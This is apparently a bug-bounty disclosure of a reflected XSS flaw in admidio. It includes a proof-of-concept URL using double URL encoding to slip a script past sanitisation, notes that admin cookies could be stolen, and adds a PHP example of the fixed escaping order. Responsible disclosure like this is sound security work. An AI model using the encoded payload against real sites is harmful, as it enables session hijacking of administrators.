Cross-site Scripting (XSS) - Reflected in admidio/admidio

Valid

Reported on Oct 18th 2021


Description

It is possible to perform reflected XSS by using double URL encoding when retrieving files.

Proof of Concept

Trigger XSS via

http://10.0.2.15/admidio/adm_program/modules/documents-files/documents_files_function.php?mode=6&folder_id=1&name=%253c%2573%2563%2572%2569%2570%2574%253e%2561%256c%2565%2572%2574%2528%2531%2529%253c%252f%2573%2563%2572%2569%2570%2574%253e

Impact

It is possible to trick admin users into visiting the malicious link, which executes the XSS and allows cookies to be stolen. It is also possible to execute actions as the admin user via malicious JavaScript.

Occurrences

HTML sanitisation should be done after all input has been transformed.
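
The ordering problem described above, shown as an added example (not admidio's code and not part of the original report). The function names are hypothetical, and `strip_tags`/`htmlspecialchars` are assumptions standing in for whatever sanitiser the application applies; the sample input is the `name` value from the proof-of-concept URL.

```php
<?php
declare(strict_types=1);

// Constructed sample: the `name` value from the proof-of-concept URL,
// exactly as it appears on the wire (double URL-encoded).
const WIRE_NAME = '%253c%2573%2563%2572%2569%2570%2574%253e%2561%256c%2565%2572%2574'
    . '%2528%2531%2529%253c%252f%2573%2563%2572%2569%2570%2574%253e';

// PHP decodes query parameters once before filling $_GET, so the
// application sees a value that is still URL-encoded one level deep.
function asSeenInGet(string $wire): string
{
    return urldecode($wire);
}

// Hypothetical flawed order: sanitise first, transform (decode) afterwards.
// The sanitiser sees only percent-escapes, finds nothing to strip or escape,
// and the later decode turns them back into markup.
function renderSanitiseThenDecode(string $param): string
{
    $clean = htmlspecialchars(strip_tags($param), ENT_QUOTES, 'UTF-8');
    return urldecode($clean);
}

// Corrected order: finish every transformation, then escape at the point
// where the value is written into HTML.
function renderDecodeThenEscape(string $param): string
{
    $decoded = urldecode($param);
    return htmlspecialchars($decoded, ENT_QUOTES, 'UTF-8');
}

$param = asSeenInGet(WIRE_NAME);
echo 'in $_GET:         ', $param, PHP_EOL;
echo 'sanitise->decode: ', renderSanitiseThenDecode($param), PHP_EOL;
echo 'decode->escape:   ', renderDecodeThenEscape($param), PHP_EOL;
```

Run from the CLI, the second line of output contains live markup while the third contains only HTML entities, which is the difference the report's remediation note describes.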

We have contacted a member of the admidio team and are waiting to hear back a year ago
haxatron modified the report a year ago
Markus Faßbender validated this vulnerability a year ago
haxatron has been awarded the disclosure bounty
The fix bounty is now up for grabs
Markus Faßbender confirmed that a fix has been merged on 01a83d a year ago
Markus Faßbender has been awarded the fix bounty